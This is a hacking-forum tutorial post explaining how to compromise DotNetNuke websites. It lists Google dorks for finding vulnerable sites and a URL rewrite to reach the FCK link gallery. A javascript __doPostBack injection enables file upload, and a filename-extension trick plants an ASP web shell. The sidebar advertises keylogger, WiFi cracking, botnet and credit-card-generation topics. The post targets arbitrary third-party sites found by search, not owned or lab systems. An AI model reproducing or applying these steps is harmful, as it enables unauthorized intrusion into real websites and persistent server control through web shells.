Ethical Experts
Ethical Experts
Ethical Experts
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Ethical Experts

A Community Dedicated to Helping and Learning . Here You Will Get Hacking Tutorials and Monetizing Methods . We Hope You Have a Pleasant Stay
 
HomeHome  SearchSearch  Latest imagesLatest images  RegisterRegister  Log in  
Still Currently working on the forum design, until I find a perfect design that can sit there for the whole life :p .. Please Bare with us if you see the design change while / after you refresh a page or return ! Sorry for the Inconvenience ~!
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Hack Pack : Largest Hacking Tools Collection
DNN (Dot Net Nuke Exploitation) EmptyTue Apr 28, 2015 9:35 am by THE-OUTSIDER

» Hi everyone!
DNN (Dot Net Nuke Exploitation) EmptyFri Nov 07, 2014 11:24 pm by zekrum

» Hacking Email ID's
DNN (Dot Net Nuke Exploitation) EmptyThu Sep 25, 2014 7:22 pm by NAVEEN KUMAR . S

» entering in a computer binary
DNN (Dot Net Nuke Exploitation) EmptySat Sep 20, 2014 1:29 pm by erosh23

» hi hackers
DNN (Dot Net Nuke Exploitation) EmptySat Sep 20, 2014 1:26 pm by erosh23

» Introduce Yourself !
DNN (Dot Net Nuke Exploitation) EmptySat Sep 20, 2014 1:23 pm by erosh23

» Hello guys
DNN (Dot Net Nuke Exploitation) EmptyWed Jul 30, 2014 10:52 pm by RZero67

» need botnet like zues Betabot or any good botnet files please admin help me
DNN (Dot Net Nuke Exploitation) EmptyFri Jul 25, 2014 9:44 pm by sire_roktiv

» Extension Spoofer v0.1 [Beta Release]
DNN (Dot Net Nuke Exploitation) EmptyFri Jul 11, 2014 9:33 am by The Joker

Most Viewed Topics
Hack Pack : Largest Hacking Tools Collection
HACK WIFI PASSWORD USING CMD WHEN YOU ARE CONNECTED WITH WIFI
Hack Your BroadBand !! RISK FREE !!
Hacking With Keyloggers Prorat
How to Hack the Windows Admin Password Using OphCrack in Backtrack tutorial
How to Get Unlimited time in an Internet Cafe ... :D
How to Hack Websites & Servers - Tutorial
Cracking a WPA/WPA-2 Password.. ;)
Backtrack and Facebook
Credit Card Generating Sequence
Keywords
LARGEST netcat hack wifi
Facebook Like

Ethical Experts :: Hacking Section :: Hacking Tutorials
 

 DNN (Dot Net Nuke Exploitation)

Go down 
AuthorMessage
The Joker
Admin
Admin
The Joker


Posts : 182
Join date : 2012-06-11
Age : 33

DNN (Dot Net Nuke Exploitation) Empty
PostSubject: DNN (Dot Net Nuke Exploitation)   DNN (Dot Net Nuke Exploitation) EmptyThu Jan 10, 2013 4:42 pm
Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. By using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.

For the JavaScript applets to Work I would recommend you guys to use Firefox 3.0

Download Firefox V. 3.0

What is DNN (Dot Net Nuke) ?

DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Step 1: First go to google.com search page and use this following dork to find vulnerable site.

Code:

inurl:home/tabid/36/language/en-US/Default.aspx
inurl:fcklinkgallery.aspx
inurl:/portals/0 

Step 2: Open any of the Sites from the search and it should look like the one below:

Code:
http://www.someinsecuresite.com/home/tabid/36/language/en-US/Default.aspx

Now replace:
Code:
home/tabid/36/language/en-US/Default.aspx
with
Code:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

So your URL becomes:

http://www.someinsecuresite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Now Most probably assuming you get an Image like the one below, your site is vulnerable

DNN (Dot Net Nuke Exploitation) Website%2Bhacking2

Now select File: A file On your site as shown below:

DNN (Dot Net Nuke Exploitation) Website%2Bhacking3

Step 3: Now after selecting the option, we need to use a javascript code. Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.

Code:
javascript:__doPostBack('ctlURL$cmdUpload','')

After above javascript Injection is complete, you can see something like the image below:

DNN (Dot Net Nuke Exploitation) Website%2Bhacking4

Step 4: Now all you need to so is upload your shell.

Note: But remember you cant upload your shell directly in .php format and not even you can do anything by uploading .php.jpg

So for this purpose first we need to upload a special type of shell which is specially coded in asp.

You Can Download the collection of shells that i use.
Download Shells

Now here's part where you rename your shell to shell.php;.jpg

After upload complete you can view your shell by visiting the link:

http://www.someinsecuresite.com/portals/0/yourshell.asp;.jpg

Now that you have the shell uploaded, you can do whatever you like .. Wink
Back to top Go down
http://teamiha.tumblr.com
 
DNN (Dot Net Nuke Exploitation)
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Ethical Experts :: Hacking Section :: Hacking Tutorials-
Jump to: